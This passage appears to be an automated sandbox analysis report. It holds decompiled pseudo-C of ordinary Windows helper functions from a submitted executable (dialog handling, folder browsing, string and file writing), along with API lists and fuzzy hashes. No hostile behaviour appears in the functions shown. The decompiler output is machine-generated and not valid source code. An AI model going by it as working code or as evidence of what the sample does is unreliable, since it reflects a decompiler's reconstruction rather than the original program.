                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: ??2@$memset$_ultow
                                                                                                                • String ID: cf@$q
                                                                                                                • API String ID: 3448780718-2693627795
                                                                                                                • Opcode ID: 5a770fb105266b5f281bf636f392918a38755f6c8491aba89f246a667f584aac
                                                                                                                • Instruction ID: aa1ed1bb2df2d11c17fc3d40a8ec787ac421495c908f782690464d4e039b4fd8
                                                                                                                • Opcode Fuzzy Hash: 5a770fb105266b5f281bf636f392918a38755f6c8491aba89f246a667f584aac
                                                                                                                • Instruction Fuzzy Hash: 73113079A402186ACB24AB55DC41BCDB7B4AF45304F0084BAEB09771C1D7796E888FD8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 64%
                                                                                                                			E00407E24(intOrPtr* __ecx, intOrPtr _a4) {
                                                                                                                				void _v514;
                                                                                                                				signed short _v516;
                                                                                                                				void _v1026;
                                                                                                                				signed short _v1028;
                                                                                                                				void* __esi;
                                                                                                                				void* _t17;
                                                                                                                				intOrPtr* _t26;
                                                                                                                				signed short* _t28;
                                                                                                                
                                                                                                                				_v516 = _v516 & 0x00000000;
                                                                                                                				_t26 = __ecx;
                                                                                                                				memset( &_v514, 0, 0x1fc);
                                                                                                                				_v1028 = _v1028 & 0x00000000;
                                                                                                                				memset( &_v1026, 0, 0x1fc);
                                                                                                                				_t17 =  *((intOrPtr*)( *_t26 + 0x24))();
                                                                                                                				_t28 =  &_v516;
                                                                                                                				E00407250(_t28, _t17);
                                                                                                                				_push(_t28);
                                                                                                                				_push(L"</%s>\r\n");
                                                                                                                				_push(0xff);
                                                                                                                				_push( &_v1028);
                                                                                                                				L0040B1EC();
                                                                                                                				return E00407343(_t26, _a4,  &_v1028);
                                                                                                                			}












                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00407E48
                                                                                                                • memset.MSVCRT ref: 00407E5F
                                                                                                                  • Part of subcall function 00407250: wcscpy.MSVCRT ref: 00407255
                                                                                                                  • Part of subcall function 00407250: _wcslwr.MSVCRT ref: 00407288
                                                                                                                • _snwprintf.MSVCRT ref: 00407E8E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                                • String ID: </%s>
                                                                                                                • API String ID: 3400436232-259020660
                                                                                                                • Opcode ID: 8ed6d9153b8ab756a1282c4525cb1f33682d7d4062ac2741ec7bca21e753fd7d
                                                                                                                • Instruction ID: 202c728a503fdded71e402cbdefdfedacf6d04e10f6749ebe2a15fa747ba2321
                                                                                                                • Opcode Fuzzy Hash: 8ed6d9153b8ab756a1282c4525cb1f33682d7d4062ac2741ec7bca21e753fd7d
                                                                                                                • Instruction Fuzzy Hash: 820186B2D4012966D720A795CC46FEE766CEF44318F0004FABB08F71C2DB78AB458AD8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 77%
                                                                                                                			E00405E0A(intOrPtr __ecx, void* __eflags, struct HWND__* _a4) {
                                                                                                                				void _v8198;
                                                                                                                				short _v8200;
                                                                                                                				void* _t9;
                                                                                                                				void* _t12;
                                                                                                                				intOrPtr _t19;
                                                                                                                				intOrPtr _t20;
                                                                                                                
                                                                                                                				_t19 = __ecx;
                                                                                                                				_t9 = E0040B550(0x2004, __ecx);
                                                                                                                				_t20 = _t19;
                                                                                                                				if(_t20 == 0) {
                                                                                                                					_t20 =  *0x40fe24; // 0x0
                                                                                                                				}
                                                                                                                				_t25 =  *0x40fb90;
                                                                                                                				if( *0x40fb90 != 0) {
                                                                                                                					_v8200 = _v8200 & 0x00000000;
                                                                                                                					memset( &_v8198, 0, 0x2000);
                                                                                                                					_push(_t20);
                                                                                                                					_t12 = 5;
                                                                                                                					E00405E8D(_t12);
                                                                                                                					if(E00405F39(_t19, _t25, L"caption",  &_v8200) != 0) {
                                                                                                                						SetWindowTextW(_a4,  &_v8200);
                                                                                                                					}
                                                                                                                					return EnumChildWindows(_a4, E00405DAC, 0);
                                                                                                                				}
                                                                                                                				return _t9;
                                                                                                                			}










                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                                • String ID: caption
                                                                                                                • API String ID: 1523050162-4135340389
                                                                                                                • Opcode ID: 8feeb8209b6c70e9adfa8bd3f92da79707fac4aecb0355a736b6ddf0df3d27b2
                                                                                                                • Instruction ID: ff9fcce37bd20e8a069aa1bb12297d26d3abb42d57bfe77991e9b0a8e19eae59
                                                                                                                • Opcode Fuzzy Hash: 8feeb8209b6c70e9adfa8bd3f92da79707fac4aecb0355a736b6ddf0df3d27b2
                                                                                                                • Instruction Fuzzy Hash: 2DF04432940718AAEB20AB54DD4EB9B3668DB04754F0041B7BA04B61D2D7B8AE40CEDC
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00409A46(struct HINSTANCE__** __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                				struct HINSTANCE__* _t11;
                                                                                                                				struct HINSTANCE__** _t14;
                                                                                                                				struct HINSTANCE__* _t15;
                                                                                                                
                                                                                                                				_t14 = __eax;
                                                                                                                				if( *((intOrPtr*)(__eax)) == 0) {
                                                                                                                					_t11 = E00405436(L"winsta.dll");
                                                                                                                					 *_t14 = _t11;
                                                                                                                					if(_t11 != 0) {
                                                                                                                						_t14[1] = GetProcAddress(_t11, "WinStationGetProcessSid");
                                                                                                                					}
                                                                                                                				}
                                                                                                                				_t15 = _t14[1];
                                                                                                                				if(_t15 == 0) {
                                                                                                                					return 0;
                                                                                                                				} else {
                                                                                                                					return _t15->i(0, _a4, _a16, _a20, _a8, _a12);
                                                                                                                				}
                                                                                                                			}







                                                                                                                APIs
                                                                                                                  • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                  • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                  • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                  • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                • GetProcAddress.KERNEL32(00000000,WinStationGetProcessSid), ref: 00409A68
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad$AddressProcmemsetwcscat
                                                                                                                • String ID: WinStationGetProcessSid$winsta.dll$Y@
                                                                                                                • API String ID: 946536540-379566740
                                                                                                                • Opcode ID: 1b7ebfe453553e3f98933d91fdad94fbea9a23791565fec376d5a3071c2edda0
                                                                                                                • Instruction ID: f8fd4ca1437852706c932511ef9fc121d1f4ef25cad53c4396aefa54a2cc69ea
                                                                                                                • Opcode Fuzzy Hash: 1b7ebfe453553e3f98933d91fdad94fbea9a23791565fec376d5a3071c2edda0
                                                                                                                • Instruction Fuzzy Hash: 4AF08236644219AFCF219FE09C01B977BD5AB08710F00443AF945B21D1D67588509F98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 93%
                                                                                                                			E0040588E(void** __esi, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                				signed int _t21;
                                                                                                                				signed int _t23;
                                                                                                                				void* _t24;
                                                                                                                				signed int _t31;
                                                                                                                				void* _t33;
                                                                                                                				void* _t44;
                                                                                                                				signed int _t46;
                                                                                                                				void* _t48;
                                                                                                                				signed int _t51;
                                                                                                                				int _t52;
                                                                                                                				void** _t53;
                                                                                                                				void* _t58;
                                                                                                                
                                                                                                                				_t53 = __esi;
                                                                                                                				_t1 =  &(_t53[1]); // 0x0
                                                                                                                				_t51 =  *_t1;
                                                                                                                				_t21 = 0;
                                                                                                                				if(_t51 <= 0) {
                                                                                                                					L4:
                                                                                                                					_t2 =  &(_t53[2]); // 0x8
                                                                                                                					_t33 =  *_t53;
                                                                                                                					_t23 =  *_t2 + _t51;
                                                                                                                					_t46 = 8;
                                                                                                                					_t53[1] = _t23;
                                                                                                                					_t24 = _t23 * _t46;
                                                                                                                					_push( ~(0 | _t58 > 0x00000000) | _t24);
                                                                                                                					L0040B26C();
                                                                                                                					_t10 =  &(_t53[1]); // 0x0
                                                                                                                					 *_t53 = _t24;
                                                                                                                					memset(_t24, 0,  *_t10 << 3);
                                                                                                                					_t52 = _t51 << 3;
                                                                                                                					memcpy( *_t53, _t33, _t52);
                                                                                                                					if(_t33 != 0) {
                                                                                                                						_push(_t33);
                                                                                                                						L0040B272();
                                                                                                                					}
                                                                                                                					 *((intOrPtr*)( *_t53 + _t52)) = _a4;
                                                                                                                					 *((intOrPtr*)(_t52 +  *_t53 + 4)) = _a8;
                                                                                                                				} else {
                                                                                                                					_t44 =  *__esi;
                                                                                                                					_t48 = _t44;
                                                                                                                					while( *_t48 != 0) {
                                                                                                                						_t21 = _t21 + 1;
                                                                                                                						_t48 = _t48 + 8;
                                                                                                                						_t58 = _t21 - _t51;
                                                                                                                						if(_t58 < 0) {
                                                                                                                							continue;
                                                                                                                						} else {
                                                                                                                							goto L4;
                                                                                                                						}
                                                                                                                						goto L7;
                                                                                                                					}
                                                                                                                					_t31 = _t21 << 3;
                                                                                                                					 *((intOrPtr*)(_t44 + _t31)) = _a4;
                                                                                                                					 *((intOrPtr*)(_t31 +  *_t53 + 4)) = _a8;
                                                                                                                				}
                                                                                                                				L7:
                                                                                                                				return 1;
                                                                                                                			}















                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: ??2@??3@memcpymemset
                                                                                                                • String ID:
                                                                                                                • API String ID: 1865533344-0
                                                                                                                • Opcode ID: 842e7f25b611a1b365b40b1c94d0ccd91a374462c013338e9ea48621bac1a915
                                                                                                                • Instruction ID: bfbe461037e943c94cde62efea7f8de8011d206b5eb27adb1998baad11e83e26
                                                                                                                • Opcode Fuzzy Hash: 842e7f25b611a1b365b40b1c94d0ccd91a374462c013338e9ea48621bac1a915
                                                                                                                • Instruction Fuzzy Hash: 9F116A722046019FD328DF2DC881A2BF7E5EFD8300B248C2EE49A97395DB35E801CB58
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 37%
                                                                                                                			E0040ACFC(wchar_t* __esi, char _a4, intOrPtr _a8) {
                                                                                                                				void* _v8;
                                                                                                                				wchar_t* _v16;
                                                                                                                				intOrPtr _v20;
                                                                                                                				intOrPtr _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				intOrPtr _v32;
                                                                                                                				intOrPtr _v36;
                                                                                                                				char _v40;
                                                                                                                				long _v564;
                                                                                                                				char* _t18;
                                                                                                                				char* _t22;
                                                                                                                				wchar_t* _t23;
                                                                                                                				intOrPtr* _t24;
                                                                                                                				intOrPtr* _t26;
                                                                                                                				intOrPtr _t30;
                                                                                                                				void* _t35;
                                                                                                                				char* _t36;
                                                                                                                
                                                                                                                				_t18 =  &_v8;
                                                                                                                				_t30 = 0;
                                                                                                                				__imp__SHGetMalloc(_t18);
                                                                                                                				if(_t18 >= 0) {
                                                                                                                					_v40 = _a4;
                                                                                                                					_v28 = _a8;
                                                                                                                					_t22 =  &_v40;
                                                                                                                					_v36 = 0;
                                                                                                                					_v32 = 0;
                                                                                                                					_v24 = 4;
                                                                                                                					_v20 = E0040AC81;
                                                                                                                					_v16 = __esi;
                                                                                                                					__imp__SHBrowseForFolderW(_t22, _t35);
                                                                                                                					_t36 = _t22;
                                                                                                                					if(_t36 != 0) {
                                                                                                                						_t23 =  &_v564;
                                                                                                                						__imp__SHGetPathFromIDListW(_t36, _t23);
                                                                                                                						if(_t23 != 0) {
                                                                                                                							_t30 = 1;
                                                                                                                							wcscpy(__esi,  &_v564);
                                                                                                                						}
                                                                                                                						_t24 = _v8;
                                                                                                                						 *((intOrPtr*)( *_t24 + 0x14))(_t24, _t36);
                                                                                                                						_t26 = _v8;
                                                                                                                						 *((intOrPtr*)( *_t26 + 8))(_t26);
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return _t30;
                                                                                                                			}




















                                                                                                                APIs
                                                                                                                • SHGetMalloc.SHELL32(?), ref: 0040AD0C
                                                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 0040AD3E
                                                                                                                • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0040AD52
                                                                                                                • wcscpy.MSVCRT ref: 0040AD65
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 3917621476-0
                                                                                                                • Opcode ID: 2a6e8ca006a625361a9e73932945a98b974e7be3bf153fbb13282c81ef302996
                                                                                                                • Instruction ID: e4c3f7e47c5e56e8be22c5f757262c1ae757d72ab7f138bc7c026954c7aa5c2b
                                                                                                                • Opcode Fuzzy Hash: 2a6e8ca006a625361a9e73932945a98b974e7be3bf153fbb13282c81ef302996
                                                                                                                • Instruction Fuzzy Hash: B011FAB5900208EFDB10EFA9D9889AEB7F8FF48300F10416AE905E7240D738DA05CFA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00404A44(void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
                                                                                                                				long _v8;
                                                                                                                				long _v12;
                                                                                                                				long _t13;
                                                                                                                				void* _t14;
                                                                                                                				struct HWND__* _t24;
                                                                                                                
                                                                                                                				_t24 = GetDlgItem(_a4, _a8);
                                                                                                                				_t13 = SendMessageW(_t24, 0x146, 0, 0);
                                                                                                                				_v12 = _t13;
                                                                                                                				_v8 = 0;
                                                                                                                				if(_t13 <= 0) {
                                                                                                                					L3:
                                                                                                                					_t14 = 0;
                                                                                                                				} else {
                                                                                                                					while(SendMessageW(_t24, 0x150, _v8, 0) != _a12) {
                                                                                                                						_v8 = _v8 + 1;
                                                                                                                						if(_v8 < _v12) {
                                                                                                                							continue;
                                                                                                                						} else {
                                                                                                                							goto L3;
                                                                                                                						}
                                                                                                                						goto L4;
                                                                                                                					}
                                                                                                                					SendMessageW(_t24, 0x14e, _v8, 0);
                                                                                                                					_t14 = 1;
                                                                                                                				}
                                                                                                                				L4:
                                                                                                                				return _t14;
                                                                                                                			}








                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32 ref: 00404A52
                                                                                                                • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00404A6A
                                                                                                                • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00404A80
                                                                                                                • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00404AA3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Item
                                                                                                                • String ID:
                                                                                                                • API String ID: 3888421826-0
                                                                                                                • Opcode ID: 8e654b4fb51c2e6e0140a28d1ff35be7b55d0d95af2e0242a2f6fa2b8df4bf67
                                                                                                                • Instruction ID: a803108f18d13bdb161ef9cfeaea96f484be20865a03d7d0c1e8cd60aac843f5
                                                                                                                • Opcode Fuzzy Hash: 8e654b4fb51c2e6e0140a28d1ff35be7b55d0d95af2e0242a2f6fa2b8df4bf67
                                                                                                                • Instruction Fuzzy Hash: 02F01DB1A4010CFEEB018FD59DC1DAF7BBDEB89755F104479F604E6150D2709E41AB64
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 93%
                                                                                                                			E004072D8(void* __ecx, void* __eflags, void* _a4, short* _a8) {
                                                                                                                				long _v8;
                                                                                                                				void _v8199;
                                                                                                                				char _v8200;
                                                                                                                
                                                                                                                				E0040B550(0x2004, __ecx);
                                                                                                                				_v8200 = 0;
                                                                                                                				memset( &_v8199, 0, 0x1fff);
                                                                                                                				WideCharToMultiByte(0, 0, _a8, 0xffffffff,  &_v8200, 0x1fff, 0, 0);
                                                                                                                				return WriteFile(_a4,  &_v8200, strlen( &_v8200),  &_v8, 0);
                                                                                                                			}







                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 004072FD
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00407316
                                                                                                                • strlen.MSVCRT ref: 00407328
                                                                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00407339
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 2754987064-0
                                                                                                                • Opcode ID: a01a9356340fd52416386d9a0609ab8b35de944153756caad9cad7d66f149dcb
                                                                                                                • Instruction ID: b20814eff52bbcc052d034fa9df9783175f47b69a9638c3bed99c582471ba408
                                                                                                                • Opcode Fuzzy Hash: a01a9356340fd52416386d9a0609ab8b35de944153756caad9cad7d66f149dcb
                                                                                                                • Instruction Fuzzy Hash: E7F0FFB740022CBEEB05A7949DC9DDB776CDB08358F0001B6B715E2192D6749E448BA8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00408DC8(void** __eax, struct HWND__* _a4) {
                                                                                                                				int _t7;
                                                                                                                				void** _t11;
                                                                                                                
                                                                                                                				_t11 = __eax;
                                                                                                                				if( *0x4101b4 == 0) {
                                                                                                                					memcpy(0x40f5c8,  *__eax, 0x50);
                                                                                                                					memcpy(0x40f2f8,  *(_t11 + 4), 0x2cc);
                                                                                                                					 *0x4101b4 = 1;
                                                                                                                					_t7 = DialogBoxParamW(GetModuleHandleW(0), 0x6b, _a4, E00408ADB, 0);
                                                                                                                					 *0x4101b4 =  *0x4101b4 & 0x00000000;
                                                                                                                					 *0x40f2f4 = _t7;
                                                                                                                					return 1;
                                                                                                                				} else {
                                                                                                                					return 1;
                                                                                                                				}
                                                                                                                			}






                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: memcpy$DialogHandleModuleParam
                                                                                                                • String ID:
                                                                                                                • API String ID: 1386444988-0
                                                                                                                • Opcode ID: 891701deeecd0a5aff4f8729167f2b3d3e4c53b818b809e7ef3862d897c56b7c
                                                                                                                • Instruction ID: 2efff09082e6186f10957894d43819ba35d003f4fc085d6afb87634920226402
                                                                                                                • Opcode Fuzzy Hash: 891701deeecd0a5aff4f8729167f2b3d3e4c53b818b809e7ef3862d897c56b7c
                                                                                                                • Instruction Fuzzy Hash: FAF08231695310BBD7206BA4BE0AB473AA0D700B16F2484BEF241B54E0C7FA04559BDC
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E004050E1(wchar_t* __edi, wchar_t* _a4) {
                                                                                                                				int _t10;
                                                                                                                				int _t12;
                                                                                                                				void* _t23;
                                                                                                                				wchar_t* _t24;
                                                                                                                				signed int _t25;
                                                                                                                
                                                                                                                				_t24 = __edi;
                                                                                                                				_t25 = wcslen(__edi);
                                                                                                                				_t10 = wcslen(_a4);
                                                                                                                				_t23 = _t10 + _t25;
                                                                                                                				if(_t23 >= 0x3ff) {
                                                                                                                					_t12 = _t10 - _t23 + 0x3ff;
                                                                                                                					if(_t12 > 0) {
                                                                                                                						wcsncat(__edi + _t25 * 2, _a4, _t12);
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					wcscat(__edi + _t25 * 2, _a4);
                                                                                                                				}
                                                                                                                				return _t24;
                                                                                                                			}









                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: wcslen$wcscatwcsncat
                                                                                                                • String ID:
                                                                                                                • API String ID: 291873006-0
                                                                                                                • Opcode ID: dae96c5ac082cb53d340fe27b4bc8b5cd34b90fa375a26752ac010ecfec8ae38
                                                                                                                • Instruction ID: d151cadb35ebc04527c95d650d15a6f00d765f1fde14687ca002c1c28d544fc6
                                                                                                                • Opcode Fuzzy Hash: dae96c5ac082cb53d340fe27b4bc8b5cd34b90fa375a26752ac010ecfec8ae38
                                                                                                                • Instruction Fuzzy Hash: 3CE0EC36908703AECB042625AC45C6F375DEF84368B50843FF410E6192EF3DD51556DD
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00402DDD(struct HWND__* __eax, void* __ecx) {
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				struct HWND__* _t11;
                                                                                                                				struct HWND__* _t14;
                                                                                                                				struct HWND__* _t15;
                                                                                                                				void* _t16;
                                                                                                                
                                                                                                                				_t14 = __eax;
                                                                                                                				_t16 = __ecx;
                                                                                                                				 *((intOrPtr*)(__ecx + 0x10)) = __eax;
                                                                                                                				GetClientRect(__eax, __ecx + 0xa14);
                                                                                                                				 *(_t16 + 0xa24) =  *(_t16 + 0xa24) & 0x00000000;
                                                                                                                				_t15 = GetWindow(GetWindow(_t14, 5), 0);
                                                                                                                				do {
                                                                                                                					E00402D99(_t15, _t16);
                                                                                                                					_t11 = GetWindow(_t15, 2);
                                                                                                                					_t15 = _t11;
                                                                                                                				} while (_t15 != 0);
                                                                                                                				return _t11;
                                                                                                                			}










                                                                                                                APIs
                                                                                                                • GetClientRect.USER32 ref: 00402DEF
                                                                                                                • GetWindow.USER32(?,00000005), ref: 00402E07
                                                                                                                • GetWindow.USER32(00000000), ref: 00402E0A
                                                                                                                  • Part of subcall function 00402D99: GetWindowRect.USER32 ref: 00402DA8
                                                                                                                  • Part of subcall function 00402D99: MapWindowPoints.USER32 ref: 00402DC3
                                                                                                                • GetWindow.USER32(00000000,00000002), ref: 00402E16
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: Window$Rect$ClientPoints
                                                                                                                • String ID:
                                                                                                                • API String ID: 4235085887-0
                                                                                                                • Opcode ID: 1c8c52d1646566c0c406de3dcd2af47f97e9d21a3de7b74f78bd3c756d76e5a1
                                                                                                                • Instruction ID: 77c271d885eafffee951e9f606c1c6e1ef1898ae553cc6e200c9330dee891b18
                                                                                                                • Opcode Fuzzy Hash: 1c8c52d1646566c0c406de3dcd2af47f97e9d21a3de7b74f78bd3c756d76e5a1
                                                                                                                • Instruction Fuzzy Hash: B8E092722407006BE22197398DC9FABB2EC9FC9761F11053EF504E7280DBB8DC014669
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 72%
                                                                                                                			E0040B6A6() {
                                                                                                                				intOrPtr _t1;
                                                                                                                				intOrPtr _t2;
                                                                                                                				intOrPtr _t3;
                                                                                                                				intOrPtr _t4;
                                                                                                                
                                                                                                                				_t1 =  *0x41c458;
                                                                                                                				if(_t1 != 0) {
                                                                                                                					_push(_t1);
                                                                                                                					L0040B272();
                                                                                                                				}
                                                                                                                				_t2 =  *0x41c460;
                                                                                                                				if(_t2 != 0) {
                                                                                                                					_push(_t2);
                                                                                                                					L0040B272();
                                                                                                                				}
                                                                                                                				_t3 =  *0x41c45c;
                                                                                                                				if(_t3 != 0) {
                                                                                                                					_push(_t3);
                                                                                                                					L0040B272();
                                                                                                                				}
                                                                                                                				_t4 =  *0x41c464;
                                                                                                                				if(_t4 != 0) {
                                                                                                                					_push(_t4);
                                                                                                                					L0040B272();
                                                                                                                					return _t4;
                                                                                                                				}
                                                                                                                				return _t4;
                                                                                                                			}








                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: ??3@
                                                                                                                • String ID:
                                                                                                                • API String ID: 613200358-0
                                                                                                                • Opcode ID: ef9eb957481d268ec3f2fcbbe6b30702ac595c163cb660d0b33d8110378005bf
                                                                                                                • Instruction ID: 3bd5cb9a150004800b4bedd87e83f43d671674f7d7a0a5890c52a9af046e0154
                                                                                                                • Opcode Fuzzy Hash: ef9eb957481d268ec3f2fcbbe6b30702ac595c163cb660d0b33d8110378005bf
                                                                                                                • Instruction Fuzzy Hash: 96E00261B8820196DD249A7AACD5D6B239C9A05794314847EF804E72E5DF39D44045ED
                                                                                                                Uniqueness

